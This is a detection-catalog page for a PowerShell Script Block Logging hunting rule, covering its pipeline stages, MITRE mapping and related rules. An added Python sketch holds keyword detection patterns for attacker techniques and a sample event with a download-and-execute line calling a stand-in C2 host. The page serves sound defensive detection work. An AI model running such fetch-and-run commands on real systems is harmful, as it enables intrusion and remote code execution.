PowerShell 4104 Hunting
The following analytic identifies suspicious PowerShell execution using Script Block Logging (EventCode 4104). It leverages specific patterns and keywords within the ScriptBlockText field to detect potentially malicious activities. This detection is significant for SOC analysts as PowerShell is commonly used by attackers for various malicious purposes, including code execution, privilege escalation, and persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary commands, exfiltrate data, or maintain long-term access to the compromised system, posing a severe threat to the organization's security.
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1059.001 Command and Scripting Interpreter: PowerShell |
Event coverage
| Provider | Event ID | Title |
|---|---|---|
| PowerShell | 4104 | Creating Scriptblock text (MessageNumber of MessageTotal). |
Stages and Predicates
Stage 1: search
search EventCode=4104
Stage 2: eval
eval ... using (ScriptBlockText)
Stage 3: eval
eval ... using (ScriptBlockText)
Stage 4: eval
eval ... using (ScriptBlockText)
Stage 5: eval
eval ... using (ScriptBlockText)
Stage 6: eval
eval ... using (ScriptBlockText)
Stage 7: eval
eval ... using (ScriptBlockText)
Stage 8: eval
eval ... using (ScriptBlockText)
Stage 9: eval
eval ... using (ScriptBlockText)
Stage 10: eval
eval ... using (ScriptBlockText)
Stage 11: eval
eval ... using (ScriptBlockText)
Stage 12: eval
eval ... using (ScriptBlockText)
Stage 13: eval
eval ... using (ScriptBlockText)
Stage 14: eval
eval ... using (ScriptBlockText)
Stage 15: eval
eval ... using (ScriptBlockText)
Stage 16: eval
eval ... using (ScriptBlockText)
Stage 17: eval
eval ... using (ScriptBlockText)
Stage 18: eval
eval ... using (ScriptBlockText)
Stage 19: eval
eval ... using (ScriptBlockText)
Stage 20: addtotals
addtotals
Stage 21: stats
stats BY UserID, Computer, DoIt, enccom, compressed, downgrade, iex, mimikatz, rundll32, empire, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get, suspcmdlet, suspkeywrd
Stage 22: rename
rename
Stage 23: search
search `macro`
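The pipeline above, with its per-flag eval stages elided, reduced to a runnable sketch of the same shape: filter to EventCode 4104, set one 0/1 flag per keyword family on ScriptBlockText, sum them as addtotals does, then group by UserID, Computer and the flag vector as the stats stage does. This is an added example, not the rule's SPL: the regexes, the sample events and the ordering are assumptions, and only a subset of the flags named in the stats clause is modelled.

```python
import re
from collections import Counter

# Assumed keyword patterns (case-insensitive), one per modelled flag from the
# rule's "stats BY" clause; illustrative approximations, not the rule's own evals.
FLAG_PATTERNS = {
    "enccom":     r"-e(c|nc|ncodedcommand)?\b",        # -e / -ec / -enc / -EncodedCommand
    "compressed": r"GZipStream|DeflateStream|Decompress",
    "downgrade":  r"-v(ersion)?\s+2\b",                # request for the v2 engine
    "iex":        r"\bIEX\b|Invoke-Expression",
    "rundll32":   r"rundll32",
    "webclient":  r"Net\.WebClient|DownloadString|DownloadFile",
    "syswow64":   r"syswow64",
    "reflection": r"Reflection\.Assembly",
    "invokewmi":  r"Invoke-WmiMethod",
    "invokecmd":  r"Invoke-Command",
    "base64":     r"FromBase64String",
}

def flag_script_block(script_block_text):
    """Stages 2-19 analogue: 0/1 per flag, plus an addtotals-style Total (stage 20)."""
    flags = {name: int(bool(re.search(pat, script_block_text, re.IGNORECASE)))
             for name, pat in FLAG_PATTERNS.items()}
    flags["Total"] = sum(flags.values())
    return flags

def hunt(events):
    """Stages 1 and 21 analogue: keep EventCode 4104, flag each block, count by
    (UserID, Computer, flag vector) and list the most-flagged combinations first."""
    counts = Counter()
    for ev in events:
        if ev.get("EventCode") != 4104:       # search EventCode=4104
            continue
        flags = flag_script_block(ev.get("ScriptBlockText", ""))
        counts[(ev["UserID"], ev["Computer"], tuple(flags.items()))] += 1
    rows = [{"UserID": u, "Computer": c, **dict(f), "count": n}
            for (u, c, f), n in counts.items()]
    return sorted(rows, key=lambda r: (-r["Total"], r["UserID"]))

# Constructed sample events (not real telemetry); the last one is not a 4104.
SAMPLE_EVENTS = [
    {"EventCode": 4104, "UserID": "CORP\\alice", "Computer": "ws01",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"},
    {"EventCode": 4104, "UserID": "CORP\\alice", "Computer": "ws01",
     "ScriptBlockText": "powershell.exe -version 2 -enc <base64-omitted>"},
    {"EventCode": 4104, "UserID": "CORP\\svc-backup", "Computer": "srv02",
     "ScriptBlockText": "Get-ChildItem C:\\Backups | Compress-Archive -DestinationPath C:\\out.zip"},
    {"EventCode": 4103, "UserID": "CORP\\alice", "Computer": "ws01",
     "ScriptBlockText": "IEX 'ignored: not a 4104 event'"},
]
```

Rows with a Total of 0 (the backup job here) are the benign baseline a hunter would drop first; the real rule's final filtering is behind the `macro` stage and is not shown on this page.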
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
| EventCode | eq | 4104 |
Neighbors
Stricter alternatives (narrower than this rule)
The rules below may be useful if you find the current rule too noisy or lacking in specificity.
- Windows Exfiltration Over C2 Via Invoke RestMethod (adds 5 filters)
- Windows Gather Victim Host Information Camera (adds 5 filters)
- Allow Inbound Traffic In Firewall Rule (adds 4 filters)
- GetWmiObject DS User with PowerShell Script Block (adds 4 filters)
- Remote Process Instantiation via WMI and PowerShell Script Block (adds 4 filters)
- AdsiSearcher Account Discovery (adds 3 filters)
- GetWmiObject Ds Computer with PowerShell Script Block (adds 3 filters)
- GetWmiObject Ds Group with PowerShell Script Block (adds 3 filters)
- Remote System Discovery with Adsisearcher (adds 3 filters)
- Windows Account Discovery for None Disable User Account (adds 3 filters)
- Windows Linked Policies In ADSI Discovery (adds 3 filters)
- Windows PowerShell Disable HTTP Logging (adds 3 filters)
- Windows Powershell Import Applocker Policy (adds 3 filters)
- Windows Root Domain linked policies Discovery (adds 3 filters)
- Delete ShadowCopy With PowerShell (adds 2 filters)
- Detect Copy of ShadowCopy with Script Block Logging (adds 2 filters)
- Detect Empire with PowerShell Script Block Logging (adds 2 filters)
- Disabled Kerberos Pre-Authentication Discovery With Get-ADUser (adds 2 filters)
- Disabled Kerberos Pre-Authentication Discovery With PowerView (adds 2 filters)
- Elevated Group Discovery with PowerView (adds 2 filters)
- Get ADUser with PowerShell Script Block (adds 2 filters)
- Get WMIObject Group Discovery with Script Block Logging (adds 2 filters)
- GetCurrent User with PowerShell Script Block (adds 2 filters)
- GetWmiObject User Account with PowerShell Script Block (adds 2 filters)
- Interactive Session on Remote Endpoint with PowerShell (adds 2 filters)
- Kerberos Pre-Authentication Flag Disabled with PowerShell (adds 2 filters)
- Powershell Enable SMB1Protocol Feature (adds 2 filters)
- Powershell Remote Services Add TrustedHost (adds 2 filters)
- Powershell Remove Windows Defender Directory (adds 2 filters)
- Powershell Using memory As Backing Store (adds 2 filters)
- PowerShell WebRequest Using Memory Stream (adds 2 filters)
- Powershell Windows Defender Exclusion Commands (adds 2 filters)
- Recon AVProduct Through Pwh or WMI (adds 2 filters)
- Recon Using WMI Class (adds 2 filters)
- Remote Process Instantiation via WinRM and PowerShell Script Block (adds 2 filters)
- Windows Account Discovery for Sam Account Name (adds 2 filters)
- Windows Account Discovery With NetUser PreauthNotRequire (adds 2 filters)
- Windows Archive Collected Data via Powershell (adds 2 filters)
- Windows Domain Account Discovery Via Get-NetComputer (adds 2 filters)
- Windows ESX Admins Group Creation via PowerShell (adds 2 filters)
- Windows Exfiltration Over C2 Via Powershell UploadString (adds 2 filters)
- Windows Get-AdComputer Unconstrained Delegation Discovery (adds 2 filters)
- Windows Powershell Cryptography Namespace (adds 2 filters)
- Windows PowerShell Get CIMInstance Remote Computer (adds 2 filters)
- Windows Powershell History File Deletion (adds 2 filters)
- Windows PowerShell Invoke-RestMethod IP Information Collection (adds 2 filters)
- Windows PowerShell MSIX Package Installation (adds 2 filters)
- Windows PowerView Constrained Delegation Discovery (adds 2 filters)
- Windows PowerView SPN Discovery (adds 2 filters)
- Windows PowerView Unconstrained Delegation Discovery (adds 2 filters)
- Windows Screen Capture Via Powershell (adds 2 filters)
- WMI Recon Running Process Or Services (adds 2 filters)
- Detect Certify With PowerShell Script Block Logging (adds 1 filter)
- Detect Mimikatz With PowerShell Script Block Logging (adds 1 filter)
- Exchange PowerShell Module Usage (adds 1 filter)
- Get ADDefaultDomainPasswordPolicy with Powershell Script Block (adds 1 filter)
- Get ADUserResultantPasswordPolicy with Powershell Script Block (adds 1 filter)
- Get DomainPolicy with Powershell Script Block (adds 1 filter)
- Get-DomainTrust with PowerShell Script Block (adds 1 filter)
- Get DomainUser with PowerShell Script Block (adds 1 filter)
- Get-ForestTrust with PowerShell Script Block (adds 1 filter)
- GetAdComputer with PowerShell Script Block (adds 1 filter)
- GetAdGroup with PowerShell Script Block (adds 1 filter)
- GetDomainComputer with PowerShell Script Block (adds 1 filter)
- GetDomainController with PowerShell Script Block (adds 1 filter)
- GetDomainGroup with PowerShell Script Block (adds 1 filter)
- GetLocalUser with PowerShell Script Block (adds 1 filter)
- GetNetTcpconnection with PowerShell Script Block (adds 1 filter)
- Mailsniper Invoke functions (adds 1 filter)
- Powershell COM Hijacking InprocServer32 Modification (adds 1 filter)
- Powershell Creating Thread Mutex (adds 1 filter)
- PowerShell Domain Enumeration (adds 1 filter)
- PowerShell Enable PowerShell Remoting (adds 1 filter)
- Powershell Execute COM Object (adds 1 filter)
- Powershell Fileless Process Injection via GetProcAddress (adds 1 filter)
- Powershell Fileless Script Contains Base64 Encoded Content (adds 1 filter)
- Powershell Get LocalGroup Discovery with Script Block Logging (adds 1 filter)
- PowerShell Invoke CIMMethod CIMSession (adds 1 filter)
- PowerShell Invoke WmiExec Usage (adds 1 filter)
- Powershell Load Module in Meterpreter (adds 1 filter)
- PowerShell Loading DotNET into Memory via Reflection (adds 1 filter)
- Powershell Processing Stream Of Data (adds 1 filter)
- PowerShell Script Block With URL Chain (adds 1 filter)
- PowerShell Start or Stop Service (adds 1 filter)
- Remote Process Instantiation via DCOM and PowerShell Script Block (adds 1 filter)
- ServicePrincipalNames Discovery with PowerShell (adds 1 filter)
- Unloading AMSI via Reflection (adds 1 filter)
- User Discovery With Env Vars PowerShell Script Block (adds 1 filter)
- Windows ClipBoard Data via Get-ClipBoard (adds 1 filter)
- Windows Enable PowerShell Web Access (adds 1 filter)
- Windows File Share Discovery With Powerview (adds 1 filter)
- Windows Find Domain Organizational Units with GetDomainOU (adds 1 filter)
- Windows Find Interesting ACL with FindInterestingDomainAcl (adds 1 filter)
- Windows Forest Discovery with GetForestDomain (adds 1 filter)
- Windows Get Local Admin with FindLocalAdminAccess (adds 1 filter)
- Windows PowerShell Add Module to Global Assembly Cache (adds 1 filter)
- Windows PowerShell Export Certificate (adds 1 filter)
- Windows PowerShell Export PfxCertificate (adds 1 filter)
- Windows PowerShell IIS Components WebGlobalModule Usage (adds 1 filter)
- Windows PowerShell Invoke-Sqlcmd Execution (adds 1 filter)
- Windows Powershell Logoff User via Quser (adds 1 filter)
- Windows PowerShell ScheduleTask (adds 1 filter)
- Windows PowerShell Script Block With Malicious String (adds 1 filter)
- Windows PowerShell WMI Win32 ScheduledJob (adds 1 filter)
- Windows PowerSploit GPP Discovery (adds 1 filter)
- Windows PowerView AD Access Control List Enumeration (adds 1 filter)
- Windows PowerView Kerberos Service Ticket Request (adds 1 filter)
Broader alternatives (more inclusive than this rule)
These rules match a superset of what this rule catches. They cover the same events plus more. Use them if you want wider coverage and can absorb more false positives.
- Potential PowerShell Obfuscation via Invalid Escape Sequences (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Character Array Reconstruction (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via High Numeric Character Proportion (drops 1 filter this rule applies)
- Potential Dynamic IEX Reconstruction via Environment Variables (drops 1 filter this rule applies)
- Dynamic IEX Reconstruction via Method String Access (drops 1 filter this rule applies)
- PowerShell Obfuscation via Negative Index String Reversal (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Reverse Keywords (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via String Concatenation (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via String Reordering (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Special Character Overuse (drops 1 filter this rule applies)